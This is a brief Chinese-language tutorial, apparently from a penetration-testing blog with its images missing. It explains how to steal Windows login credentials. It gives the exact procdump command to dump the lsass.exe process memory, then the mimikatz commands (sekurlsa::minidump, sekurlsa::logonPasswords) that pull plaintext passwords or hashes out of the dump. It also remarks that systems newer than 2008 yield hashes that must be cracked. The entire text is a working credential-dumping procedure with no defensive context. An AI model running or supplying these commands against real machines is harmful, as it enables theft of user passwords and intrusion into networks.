image

    可通利用procdump导出lsass进程数据获取lsass.exe进程中储存的名文密码

image

procdump.exe -accepteula -ma lsass.exe lsass.dmp  
保存lsass数据为lsass.dmp

image

下载到本地使用mimikatz 进行解密获取名文密码

mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonPasswords"

image

注:08系统往前内存储存为名文 往后为哈希值需自行解密!!!